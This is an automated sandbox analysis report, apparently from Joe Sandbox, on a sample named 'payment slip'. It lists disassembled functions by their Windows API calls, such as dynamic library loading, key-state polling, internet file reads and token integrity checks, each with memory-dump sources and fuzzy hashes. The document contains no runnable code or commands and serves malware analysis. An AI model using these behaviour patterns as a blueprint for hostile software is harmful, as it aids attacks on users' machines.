                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: PrivateProfile$SectionWrite$String
                                        • String ID:
                                        • API String ID: 2832842796-0
                                        • Opcode ID: 4d45e8bbcbaf8b8102a9a4d30cba3ab1cc6a0f0e0ba96b20c13a6d16aa415695
                                        • Instruction ID: ee50e44bbc16235a28d303c08a9254758ff4168a8aa626f80e38563f90080a70
                                        • Opcode Fuzzy Hash: 4d45e8bbcbaf8b8102a9a4d30cba3ab1cc6a0f0e0ba96b20c13a6d16aa415695
                                        • Instruction Fuzzy Hash: 4C515975A00619AFDB15DF65C880EAABBF5FF49314F088058E849AB362CB35ED51CF90
                                        APIs
                                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 000B8F40
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 000B8FD0
                                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 000B8FEC
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 000B9032
                                        • FreeLibrary.KERNEL32(00000000), ref: 000B9052
                                          • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,000A1043,?,75C0E610), ref: 0004F6E6
                                          • Part of subcall function 0004F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0008FA64,00000000,00000000,?,?,000A1043,?,75C0E610,?,0008FA64), ref: 0004F70D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                        • String ID:
                                        • API String ID: 666041331-0
                                        • Opcode ID: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
                                        • Instruction ID: 6d05004bf1c1ae1f4aac52dffe36ade55c3aecc79bf02e13a4cf3b08b67a106a
                                        • Opcode Fuzzy Hash: e89784f938d645c4b687b311ef24550106e1871519d6ac79896685f3b4f7d312
                                        • Instruction Fuzzy Hash: B4513535604205DFCB15EF58C4949EDBBF5FF49314B0880A8E90A9B362DB31ED86CB90
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _free
                                        • String ID:
                                        • API String ID: 269201875-0
                                        • Opcode ID: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                        • Instruction ID: b9fb26bbc569e532555f41e19d0d21658d7c5ddb18b9564153c95865b5d6d70e
                                        • Opcode Fuzzy Hash: 389624b06611f0b3e4b571c9cc54f5a921d94351b84027db2c6c91a2c752d478
                                        • Instruction Fuzzy Hash: 2A41E472A006049FDB24DF78C981AADB7F6EF89314F154569EA15EB352DB31AD01CB80
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00049141
                                        • ScreenToClient.USER32(00000000,?), ref: 0004915E
                                        • GetAsyncKeyState.USER32(00000001), ref: 00049183
                                        • GetAsyncKeyState.USER32(00000002), ref: 0004919D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: AsyncState$ClientCursorScreen
                                        • String ID:
                                        • API String ID: 4210589936-0
                                        • Opcode ID: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                        • Instruction ID: 2a0de4980b91f9966b95d07a71defdbbc539fa17d2fc65c4383eabb26749ffd4
                                        • Opcode Fuzzy Hash: aa681181faeccf4c4b398145dbf7014e50549dcaa670c1d9fd50f225015a9c76
                                        • Instruction Fuzzy Hash: 3741547190851AFBDF15AF68C848BEEB7B4FF05320F204329E469A72E5C7346950CB55
                                        APIs
                                        • GetInputState.USER32 ref: 000A38CB
                                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 000A3922
                                        • TranslateMessage.USER32(?), ref: 000A394B
                                        • DispatchMessageW.USER32(?), ref: 000A3955
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                        • String ID:
                                        • API String ID: 2256411358-0
                                        • Opcode ID: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
                                        • Instruction ID: 7d5ed7428707f3956824106689c40f10c0da8732824460de69c449ad79d3f374
                                        • Opcode Fuzzy Hash: 92f2932fc2d75a8a87fba7611ebbd7c55c1b9ba5c198474d81bc96b8ea902458
                                        • Instruction Fuzzy Hash: F7319E70904342AEFB75CBA4D848FB737E8AB07304F04456EF4A6865E0E7F89A85CB11
                                        APIs
                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 000ACF38
                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 000ACF6F
                                        • GetLastError.KERNEL32(?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFB4
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFC8
                                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,000AC21E,00000000), ref: 000ACFF2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                        • String ID:
                                        • API String ID: 3191363074-0
                                        • Opcode ID: 21396523c111884afadb8d64339fb5f690a2e7e597fba03f494268ff50cd9821
                                        • Instruction ID: 2879c64e82f0e4e1a220bf197012da72afc058d9727206169a91b6b402afbd62
                                        • Opcode Fuzzy Hash: 21396523c111884afadb8d64339fb5f690a2e7e597fba03f494268ff50cd9821
                                        • Instruction Fuzzy Hash: 9C3169B1A04205AFFB20DFE5C884EABBBF9EB15350B11443EF50AD2111DB30AE41DBA0
                                        APIs
                                        • GetWindowRect.USER32(?,?), ref: 00091915
                                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 000919C1
                                        • Sleep.KERNEL32(00000000,?,?,?), ref: 000919C9
                                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 000919DA
                                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 000919E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessagePostSleep$RectWindow
                                        • String ID:
                                        • API String ID: 3382505437-0
                                        • Opcode ID: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
                                        • Instruction ID: 7df250e95047360e7a4141d0f38a99e56ce4f24971e6139532908b3118872a86
                                        • Opcode Fuzzy Hash: 1d650847a08c5d7d90abdd6d7c2ab61fd7c2ecd22bdb713c91aba44caf9ab38d
                                        • Instruction Fuzzy Hash: 7031BF71A0021AEFEF10CFA8CD99EDE3BB5EB05315F104229F925A72D1C7709944DB90
                                        APIs
                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 000C5745
                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 000C579D
                                        • _wcslen.LIBCMT ref: 000C57AF
                                        • _wcslen.LIBCMT ref: 000C57BA
                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 000C5816
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: MessageSend$_wcslen
                                        • String ID:
                                        • API String ID: 763830540-0
                                        • Opcode ID: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
                                        • Instruction ID: 9b18677795a20835dc1fb050598198edf5b8e1d67fb11151c0c1d4ac0c69937f
                                        • Opcode Fuzzy Hash: cb15dff041c471d74227072374fd56f152fc35135770a84b74756b5b96d7861c
                                        • Instruction Fuzzy Hash: AC21A5359046189ADB209F60DC85FEE77BCFF04326F10825AE919EA181D770AAC5CF50
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 000B0951
                                        • GetForegroundWindow.USER32 ref: 000B0968
                                        • GetDC.USER32(00000000), ref: 000B09A4
                                        • GetPixel.GDI32(00000000,?,00000003), ref: 000B09B0
                                        • ReleaseDC.USER32(00000000,00000003), ref: 000B09E8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$ForegroundPixelRelease
                                        • String ID:
                                        • API String ID: 4156661090-0
                                        • Opcode ID: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
                                        • Instruction ID: da7c7aa746daf687b1b0a0a47875d91ce33538217e9213c06134dc2dab66edae
                                        • Opcode Fuzzy Hash: fc4f8305ba3d7f2dafa8040372f3fdcbb8bab36bf65186407b2fea636b5bd669
                                        • Instruction Fuzzy Hash: DC218E35600204AFE714EF65C988EEEBBE9EF49740F048068E84AE7762CB34AC04CB50
                                        APIs
                                        • GetEnvironmentStringsW.KERNEL32 ref: 0006CDC6
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CDE9
                                          • Part of subcall function 00063820: RtlAllocateHeap.NTDLL(00000000,?,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6,?,00031129), ref: 00063852
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CE0F
                                        • _free.LIBCMT ref: 0006CE22
                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CE31
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                        • String ID:
                                        • API String ID: 336800556-0
                                        • Opcode ID: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
                                        • Instruction ID: 67447c03cff0402dd761176dc95f327bb7a83c965d49644fbc945f2587af2601
                                        • Opcode Fuzzy Hash: b0d7846289686fdc78b31436ef16b12d4afbe1772f399c04d4d5975a923b0597
                                        • Instruction Fuzzy Hash: 8A018472A026557F332117B6AC88D7F79BEDFC6BA13190129FD49C7201EA6A8E0191F0
                                        APIs
                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00049693
                                        • SelectObject.GDI32(?,00000000), ref: 000496A2
                                        • BeginPath.GDI32(?), ref: 000496B9
                                        • SelectObject.GDI32(?,00000000), ref: 000496E2
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ObjectSelect$BeginCreatePath
                                        • String ID:
                                        • API String ID: 3225163088-0
                                        • Opcode ID: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
                                        • Instruction ID: e16a095929775a27fdaccd210baab0ac4a4d435109c5ffdea00e793ae67c57ed
                                        • Opcode Fuzzy Hash: d1a7c995cdfff8e943ee188c2380a5ba27dff0bda453fa35dafd300d94e2b35f
                                        • Instruction Fuzzy Hash: 8A219570802305FFEB119F65EC08BAA3BA4BB55319F110235F894965B0D3B898D1CF98
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
                                        • Instruction ID: 59045a8c0af6f50605717675dcf73ee52064bf3a39f55bce1d81e4f8c1830622
                                        • Opcode Fuzzy Hash: 4410af872f52d8041adfaa6bb68bc273e4007a4508afbff9a865e48397a2a1a7
                                        • Instruction Fuzzy Hash: CF01D671245605BA9A195652BE92FFFA39D9B20396B004024FE049E242F7B0EF14A3A1
                                        APIs
                                        • GetLastError.KERNEL32(?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?,?,0003A976,00000010,00101440,000313FC,?,000313C6), ref: 00062DFD
                                        • _free.LIBCMT ref: 00062E32
                                        • _free.LIBCMT ref: 00062E59
                                        • SetLastError.KERNEL32(00000000,00031129), ref: 00062E66
                                        • SetLastError.KERNEL32(00000000,00031129), ref: 00062E6F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_free
                                        • String ID:
                                        • API String ID: 3170660625-0
                                        • Opcode ID: 6ccd3c7c14d3853c0a883e1bb5b0a454987bc60c4b685fc02a58ba8d9dce15d3
                                        • Instruction ID: ea909cefce737d64908a6a13c55818d3e6d81e9b5755d353d147c489ac022432
                                        • Opcode Fuzzy Hash: 6ccd3c7c14d3853c0a883e1bb5b0a454987bc60c4b685fc02a58ba8d9dce15d3
                                        • Instruction Fuzzy Hash: 3D012836645E0167E72267747C46DAF269FEBD23B1B250038F425A32D3EF7A8C014170
                                        APIs
                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?,?,0009035E), ref: 0009002B
                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090046
                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090054
                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?), ref: 00090064
                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0008FF41,80070057,?,?), ref: 00090070
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                        • String ID:
                                        • API String ID: 3897988419-0
                                        • Opcode ID: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
                                        • Instruction ID: fd80ad919b9ee97255d77c4cb983b8d86fca87c96ad1d2ce2071c6857d4a19b0
                                        • Opcode Fuzzy Hash: 9831d8709aaa77137ec124fcd0ab1c35d52a8c679527b966efb261fb432bfc34
                                        • Instruction Fuzzy Hash: B4018F72600205BFEF108F68DC04FAE7AEDEB84751F144124F909D2210DB76DD44ABA0
                                        APIs
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0009E997
                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0009E9A5
                                        • Sleep.KERNEL32(00000000), ref: 0009E9AD
                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0009E9B7
                                        • Sleep.KERNEL32 ref: 0009E9F3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                        • String ID:
                                        • API String ID: 2833360925-0
                                        • Opcode ID: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
                                        • Instruction ID: c2710bfbecb035797f76f9bce006e39e145eef5088fe881c377b2b908f2c9f10
                                        • Opcode Fuzzy Hash: 055f393a9abbec517a94ce8582e68a2a06fb648bec2c22745b9813252fc543b9
                                        • Instruction Fuzzy Hash: 8A015731C01669DBEF40EBE5DC59AEDBB78FB09700F050956E902B2241CB3899509BA1
                                        APIs
                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00091114
                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091120
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 0009112F
                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00090B9B,?,?,?), ref: 00091136
                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0009114D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 842720411-0
                                        • Opcode ID: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
                                        • Instruction ID: 2afe05695e78fd98d3b13492c723fee12919a15d39385e2cb964171c8ecddfbb
                                        • Opcode Fuzzy Hash: cc945112351372f665fb661deb96386264e48712c829480c3702112bf45a6b67
                                        • Instruction Fuzzy Hash: 4A013C75200205BFEB114FA5DC4DEAA3FAEEF8A3A0B244419FA49D7360DB35DD019B60
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00090FCA
                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00090FD6
                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00090FE5
                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00090FEC
                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00091002
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                        • String ID:
                                        • API String ID: 44706859-0
                                        • Opcode ID: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
                                        • Instruction ID: 9715cb5ae17d22662098d59513afed6d8777d2b58240e27d2f96fbe790ae82dd
                                        • Opcode Fuzzy Hash: 1989f2fbfb3d237e17a80981b64d7d6774081057b9be68582bb429ae3871c614
                                        • Instruction Fuzzy Hash: DCF04935200302ABEB214FA5EC49F963BADFF8A762F244414FE49C6251CA75DC50CA60
                                        APIs
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0009102A
                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00091036
                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091045
                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0009104C
                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00091062
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                         • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmp
